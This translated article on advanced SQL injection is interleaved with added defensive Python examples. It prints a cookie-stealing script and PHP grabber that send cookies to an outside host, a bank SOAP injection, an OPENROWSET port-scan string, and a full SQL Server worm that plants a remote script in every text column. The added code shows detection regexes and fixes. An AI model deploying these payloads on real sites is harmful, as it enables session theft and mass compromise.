Exploration of SQL injection attacks and deep attacks

Source: Internet
Author: User
Tags: basic sql injection, sql injection attack

Author: evilboy
0x01 The internal mechanism of SQL injection attacks

SQL injection attacks have existed for a long time, have harmed many websites, and show no sign of stopping. In China the techniques of SQL injection seem to have matured: many large websites now defend against the basic forms of the attack, so attack and defence appear to be in balance, and how to break that balance is a good topic. The slogan still applies: the breakthrough is found in the confrontation between attack and defence. In this article we mainly discuss some in-depth SQL injection attack techniques and some of the more "artistic" injection techniques.

What follows is my personal summary of the essence of SQL injection: it is database operations performed beyond the authorization that was granted. I also think SQL injection is not limited to web systems; it can exist in other software and systems as well. The common web-based SQL injection attack obtains information and carries out malicious actions through malicious web requests, and only this class is discussed here.

The core of our discussion is how to carry out SQL injection, or rather how to get more value out of it. First, one must understand the specific database well enough to make full use of its features, rather than being limited to the simple "and 1=1" / "and 1=2" checks. Understanding the database is essential; otherwise one is always confined to the most basic attacks.

Next we introduce several uncommon attack methods, so that their meaning is fully understood and the "art" of SQL injection can be put to better use.

0x02 Examples of advanced SQL injection attack methods

The following are some of the special SQL injection attack techniques I have come across. Because of the length of the article I only explain each briefly; for more detail I hope to build a similar project that summarizes the experience fully.

1. SQL injection + XSS attacks

Abroad this type of attack is called XFS. JavaScript is converted with char() and carried into the SQL statement; the database decodes the characters in char(), the result is written into the page, and the XSS code executes. Such attacks have certain limitations, but they can still be used effectively.

<SCRIPT>alert('xss')</script> is an XSS snippet that pops up "xss". First we convert it to char(), then bring it into the SQL injection statement.
The converted ASCII values are as follows:
ASCII: 60 83 67 82 73 80 84 62 97 108 101 114 116 40 39 120 115 115 39 41 60 47 115 99 114 105 112 116 62
We then bring this into the SQL statement, so that the XSS code pops up once a user opens the page. This is only an introduction; it can be used for worse, for example stealing cookies or delivering Trojans. The following is a cookie collection example:
<SCRIPT>location.href='http://www.yoursite.com/cookie.php?cookie='+escape(document.cookie)</SCRIPT>

<?php
$cookies = $_GET["cookie"];
if ($cookies)
{
    $grab = fopen("grab.txt", "a");
    fputs($grab, $cookies . "\n");
    fclose($grab);
}
?>
The XFS test environment is as follows (the URL is shown as it appears on the page, with parts of the char() list missing):
http://www.test.com/test.php?id=null+union+select+1,97,108,101,114,116,120,115,115,char(114,105,112,116,62--
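The two defects that make the attack above work are a page parameter spliced straight into the query and a database value echoed into HTML unescaped. The following is an added example (not code from the original article); it uses an in-memory SQLite table, a constructed `news` table and a constructed URL handler, and assumes nothing about the real test.php. It runs the page's char() payload against a vulnerable handler and against one that binds the parameter and escapes output, so the payload never reaches the browser as markup:

```python
import html
import sqlite3


def make_db():
    """Constructed sample table standing in for the table behind test.php (not from the page)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    conn.execute("INSERT INTO news VALUES (1, 'Welcome')")
    # Row 2 simulates content already poisoned by an earlier injection (constructed).
    conn.execute("INSERT INTO news VALUES (2, '<script>alert(1)</script>')")
    return conn


# The page's payload shape: a UNION whose second column is char(...) decoding to
# <SCRIPT>alert('xss')</script>. SQLite's char() takes code points like SQL Server's.
CHAR_PAYLOAD = ("null union select 1, char(60,83,67,82,73,80,84,62,97,108,101,114,116,40,39,"
                "120,115,115,39,41,60,47,115,99,114,105,112,116,62) --")


def render_vulnerable(conn, news_id):
    """Both defects the section relies on: the id is spliced into SQL and the title is echoed raw."""
    row = conn.execute(f"SELECT id, title FROM news WHERE id = {news_id}").fetchone()
    return "<h1>not found</h1>" if row is None else f"<h1>{row[1]}</h1>"


def render_hardened(conn, news_id):
    """Reject non-numeric ids, bind the value as a parameter, and HTML-escape on output."""
    try:
        nid = int(news_id)
    except (TypeError, ValueError):
        return "<h1>not found</h1>"
    row = conn.execute("SELECT id, title FROM news WHERE id = ?", (nid,)).fetchone()
    return "<h1>not found</h1>" if row is None else f"<h1>{html.escape(row[1])}</h1>"


if __name__ == "__main__":
    db = make_db()
    print(render_vulnerable(db, CHAR_PAYLOAD))  # the decoded script tag reaches the browser
    print(render_hardened(db, CHAR_PAYLOAD))    # not found: the payload is never SQL
    print(render_hardened(db, "2"))             # already-poisoned row is rendered inert
```

The output escaping matters independently of the query fix: once a worm of the kind described later in this article has written script tags into the table, binding parameters no longer helps, and only escaping at render time keeps the stored markup from executing.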

2. SOAP injection

Simple Object Access Protocol (SOAP) is a lightweight, simple, XML-based protocol designed to exchange structured and typed information on the web. SOAP can be combined with many existing Internet protocols and formats, including Hypertext Transfer Protocol (HTTP), Simple Mail Transfer Protocol (SMTP) and Multipurpose Internet Mail Extensions (MIME), and it supports a wide range of applications, from messaging systems to remote procedure calls (RPC). We will not spend more ink on it here; Baidu has the details. On the surface SOAP injection does not belong to SQL injection, but it is an interesting attack, and it includes XSS attacks through XML insertion.

Injecting SOAP into a bank application. The original request:

POST /transfer.asp HTTP/1.0
Host: wahh-bank.com
Content-Length: 65

FromAccount=18281008&Amount=1430&ToAccount=0844766&Submit=Submit

When processing this request, the application passes the following SOAP message to a backend component:

<soap:Envelope xmlns:soap="http://www.w3.org/2001/12/soap-envelope">
  <soap:Body>
    <Account>
      <FromAccount>18281008</FromAccount>
      <Amount>1430</Amount>
      <ClearedFunds>False</ClearedFunds>
      <ToAccount>0844766</ToAccount>
    </Account>
  </soap:Body>
</soap:Envelope>

When the application logic determines that there are not enough funds for the transfer, it sets the ClearedFunds element to False, so the component receiving the SOAP message rejects the transfer. If that component acts on the first ClearedFunds element it encounters, the transfer can succeed even when the account has insufficient funds:

POST /transfer.asp HTTP/1.0
Host: wahh-bank.com
Content-Length: 65

FromAccount=18281008&Amount=1430</Amount><ClearedFunds>True</ClearedFunds><Amount>1430&ToAccount=0844766&Submit=Submit

<soap:Envelope xmlns:soap="http://www.w3.org/2001/12/soap-envelope">
  <soap:Body>
    <Account>
      <FromAccount>18281008</FromAccount>
      <Amount>1430</Amount>
      <ClearedFunds>True</ClearedFunds>
      <Amount>1430</Amount>
      <ClearedFunds>False</ClearedFunds>
      <ToAccount>0844766</ToAccount>
    </Account>
  </soap:Body>
</soap:Envelope>

In this way the first ClearedFunds is set to True and the transfer succeeds. This is put together from an online example.
XML-based injection seems to be used by many people, but I had not heard of it from anyone else, so perhaps I am just ignorant.
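The flaw has two halves: the request handler embeds an unescaped parameter into XML, and the backend component honours the first of two elements with the same name. The following is an added example (not from the original article or from the bank application it describes); it builds constructed copies of the two SOAP messages above with the same example values, shows the "first one wins" reading the text describes, and then shows the two defences: the consumer refusing any message whose fields repeat, and the producer validating and escaping the value before it is placed in the document. The function names and the Account element path are assumptions of this example.

```python
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

SOAP_NS = "http://www.w3.org/2001/12/soap-envelope"

# Constructed copies of the two SOAP messages in the section (example values from the text).
CLEAN_SOAP = (
    f'<soap:Envelope xmlns:soap="{SOAP_NS}"><soap:Body><Account>'
    "<FromAccount>18281008</FromAccount><Amount>1430</Amount>"
    "<ClearedFunds>False</ClearedFunds><ToAccount>0844766</ToAccount>"
    "</Account></soap:Body></soap:Envelope>"
)
INJECTED_SOAP = (
    f'<soap:Envelope xmlns:soap="{SOAP_NS}"><soap:Body><Account>'
    "<FromAccount>18281008</FromAccount><Amount>1430</Amount>"
    "<ClearedFunds>True</ClearedFunds><Amount>1430</Amount>"
    "<ClearedFunds>False</ClearedFunds><ToAccount>0844766</ToAccount>"
    "</Account></soap:Body></soap:Envelope>"
)


def account_element(soap_xml):
    """Locate the Account element inside the SOAP body."""
    root = ET.fromstring(soap_xml)
    return root.find(f"{{{SOAP_NS}}}Body/Account")


def cleared_funds_first_wins(soap_xml):
    """The behaviour the text describes: the consumer honours the first ClearedFunds it meets."""
    return account_element(soap_xml).find("ClearedFunds").text


def duplicate_fields(soap_xml):
    """Names of child elements of Account that occur more than once (empty for a sane message)."""
    counts = {}
    for child in account_element(soap_xml):
        counts[child.tag] = counts.get(child.tag, 0) + 1
    return sorted(tag for tag, n in counts.items() if n > 1)


def cleared_funds_strict(soap_xml):
    """Consumer-side defence: refuse any message in which a field is repeated."""
    dups = duplicate_fields(soap_xml)
    if dups:
        raise ValueError(f"repeated fields in Account: {dups}")
    return account_element(soap_xml).find("ClearedFunds").text


def xml_field(name, raw_value):
    """Producer-side defence: escape user input before embedding it as element text."""
    return f"<{name}>{escape(raw_value)}</{name}>"


def amount_field(raw_value):
    """Stricter producer-side defence: Amount is numeric, so reject anything else before embedding."""
    if not raw_value.isdigit():
        raise ValueError("Amount must be a whole number")
    return xml_field("Amount", raw_value)


def embedded_value_survives(name, raw_value):
    """Parse the escaped field back: it must be one element, no children, text equal to the input."""
    el = ET.fromstring(xml_field(name, raw_value))
    return el.tag == name and len(list(el)) == 0 and el.text == raw_value


if __name__ == "__main__":
    print(cleared_funds_first_wins(INJECTED_SOAP))   # True: the injected element is read first
    print(duplicate_fields(INJECTED_SOAP))           # ['Amount', 'ClearedFunds']
    injected = "1430</Amount><ClearedFunds>True</ClearedFunds><Amount>1430"
    print(embedded_value_survives("Amount", injected))  # True: markup stays text once escaped
```

Escaping alone already defeats the attack, because the closing `</Amount>` in the value becomes text rather than markup; the numeric check is the cheaper rule to apply first, and the duplicate-field check on the consumer protects against any other producer that forgot both.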

3. SQL injection for port scanning

Through an SQL injection vulnerability we can scan an IP address or a CIDR block. This attack applies mainly to SQL Server databases.
Example:
http://www.example.com/news.asp?id=1 union select * from openrowset('SQLoledb', 'uid=sa;pwd=;Network=DBMSSOCN;Address=10.10.10.12,80;timeout=5', 'select * from table')--
If port 80 on 10.10.10.12 accepts the connection, the error is:
"General network error. Check your network documentation" or "OLE DB provider 'sqloledb' reported an error. The provider did not give any information about the error."
If the connection fails, "SQL Server does not exist or access denied" is displayed.

4. SQL injection worm

Through SQL injection we can implement a worm that inserts malicious code into every page. This is evil, and it applies to SQL Server.

Example (the hex-encoded payload as it appears in the request; the page shows only fragments of the hex string):

;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x
005200450020005400610062006C0065005F004300
7400200061002E006E0061006D0065002C0062002E006E
2C0073007900730063006F006C0075006D006E0073002000
061002E00780074007900700065003D0027007500270020
780074007900700065003D003300350020006F0072002000
3D003100 AS%20NVARCHAR(4000));EXEC(@S);--

Decoded, the source is as follows:

DECLARE @T varchar(255)
DECLARE @C varchar(255)

DECLARE Table_Cursor CURSOR FOR
SELECT [A].[Name], [B].[Name]
FROM sysobjects AS [A], syscolumns AS [B]
WHERE [A].[ID] = [B].[ID] AND
      [A].[XType] = 'U'  /* Table (User-Defined) */ AND
      ([B].[XType] = 99  /* NTEXT   */ OR
       [B].[XType] = 35  /* TEXT    */ OR
       [B].[XType] = 231 /* SYSNAME */ OR
       [B].[XType] = 167 /* VARCHAR */)

OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T, @C

WHILE (@@FETCH_STATUS = 0)
BEGIN
    /* every text column of every user table gets the script tag appended */
    EXEC('UPDATE [' + @T + '] SET [' + @C + '] = RTRIM(CONVERT(VARCHAR, [' + @C + '])) + ''<script src="http://www.fengnima.cn/k.js"></script>''')
    FETCH NEXT FROM Table_Cursor INTO @T, @C
END

CLOSE Table_Cursor
DEALLOCATE Table_Cursor
That is the whole of this small program.
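Both of the SQL Server techniques above leave a distinctive trace in the web server log: the port-scanning trick carries OPENROWSET with a network address, and the worm carries a CAST of a hex literal followed by EXEC of the variable. The following is an added example (not from the original article) of a small log triage script: it URL-decodes each query string, flags both signatures, and decodes the hex literal the way SQL Server reads it into NVARCHAR (UTF-16LE) so an analyst can read the injected statement without running it. The log format, the regular expressions and the sample lines are constructed assumptions of this example; the hex payload in the sample is a harmless fragment encoded the same way the worm encodes its body.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the two techniques described above (assumptions of this example):
#  - OPENROWSET/OPENDATASOURCE carrying a network address (the port-probing trick)
#  - CAST(0x... AS NVARCHAR) followed by EXEC(@var) (the hex-encoded worm payload)
OPENROWSET_RE = re.compile(r"open(?:rowset|datasource)\s*\(.*?(?:address|data source)\s*=", re.I | re.S)
HEX_CAST_RE = re.compile(r"cast\s*\(\s*0x([0-9a-f]+)\s+as\s+n?varchar", re.I)
EXEC_VAR_RE = re.compile(r"\bexec\s*\(\s*@\w+\s*\)", re.I)


def decode_hex_payload(hex_text):
    """Decode a 0x literal the way SQL Server reads it into NVARCHAR: UTF-16LE bytes."""
    return bytes.fromhex(hex_text).decode("utf-16-le", errors="replace")


def classify_query(query_string):
    """Return {'tags': [...], 'decoded': str or None} for one raw (still URL-encoded) query string."""
    q = unquote_plus(query_string)
    result = {"tags": [], "decoded": None}
    if OPENROWSET_RE.search(q):
        result["tags"].append("openrowset-remote-connection")
    m = HEX_CAST_RE.search(q)
    if m and EXEC_VAR_RE.search(q):
        result["tags"].append("hex-encoded-exec")
        result["decoded"] = decode_hex_payload(m.group(1))
    return result


def scan_log(lines):
    """Scan W3C-style lines 'date time ip method stem query status'; return (ip, stem, tags, decoded) per hit."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) < 7:
            continue
        ip, stem, query = fields[2], fields[4], fields[5]
        verdict = classify_query(query)
        if verdict["tags"]:
            hits.append((ip, stem, verdict["tags"], verdict["decoded"]))
    return hits


# Constructed sample: a harmless SQL fragment is hex-encoded the way the worm encodes its body,
# then placed in an IIS-style log line next to an OPENROWSET probe and a benign request.
INNER_SQL = "DECLARE @T varchar(255);SELECT 1"
INNER_HEX = INNER_SQL.encode("utf-16-le").hex().upper()
SAMPLE_LOG = [
    "2008-05-01 10:00:01 203.0.113.5 GET /news.asp id=1 200",
    "2008-05-01 10:00:02 203.0.113.5 GET /news.asp "
    f"id=1;DECLARE+%40S+NVARCHAR(4000);SET+%40S=CAST(0x{INNER_HEX}+AS+NVARCHAR(4000));EXEC(%40S);-- 200",
    "2008-05-01 10:00:03 203.0.113.5 GET /news.asp "
    "id=1+union+select+*+from+openrowset('SQLoledb','uid=sa;pwd=;Network=DBMSSOCN;"
    "Address=10.10.10.12,80;timeout=5','select+*+from+table')-- 500",
]


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

Decoding before matching matters: the worm's statement never appears in clear text in the log, so a rule that only looks for "UPDATE" or "script src" misses it, while the CAST/EXEC shape is present in every variant. On the database side the same two techniques are cut off at the root by disabling ad hoc distributed queries and by not running the application as a login that can read sysobjects and update every table.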

5. Search box injection

Search box injection is a simple extension of basic SQL injection. In some situations it also works; it depends on how you inject.
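A search box usually ends up inside a LIKE pattern, which is what makes it a different target from a numeric id: the quote can be closed, and even without injection the wildcards "%" and "_" are interpreted. The following is an added example (not from the original article) with a constructed SQLite catalogue; it shows the typical concatenated search beside a version that binds the whole pattern as a parameter and escapes the LIKE wildcards with an ESCAPE clause, so the user's text is matched literally. Table and function names are assumptions of this example.

```python
import sqlite3


def make_catalog():
    """Constructed sample data (not from the page): a product table plus a table an injection would aim for."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (name TEXT)")
    conn.executemany("INSERT INTO products VALUES (?)",
                     [("red shirt",), ("blue shirt",), ("100% cotton",)])
    conn.execute("CREATE TABLE users (login TEXT, pw TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'constructed-secret')")
    return conn


def search_vulnerable(conn, term):
    """The search box as it is usually written: the term is spliced straight into the LIKE pattern."""
    sql = f"SELECT name FROM products WHERE name LIKE '%{term}%'"
    return [row[0] for row in conn.execute(sql)]


def escape_like(term):
    """Make the user's term literal inside a LIKE pattern (backslash is the ESCAPE character)."""
    return term.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")


def search_hardened(conn, term):
    """Bind the whole pattern as a parameter and escape LIKE wildcards inside it."""
    pattern = f"%{escape_like(term)}%"
    rows = conn.execute("SELECT name FROM products WHERE name LIKE ? ESCAPE '\\'", (pattern,))
    return [row[0] for row in rows]


if __name__ == "__main__":
    db = make_catalog()
    injected = "' UNION SELECT pw FROM users --"
    print(search_vulnerable(db, injected))  # product names plus the users.pw value
    print(search_hardened(db, injected))    # []: the term is just text nobody's product contains
    print(search_vulnerable(db, "%"))       # every row: the wildcard is honoured
    print(search_hardened(db, "%"))         # ['100% cotton']: the wildcard is matched literally
```

The wildcard escaping is the part most parameterised rewrites forget: binding alone stops the UNION, but a bare "%" still returns the whole table, which is the enumeration behaviour this section is about.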
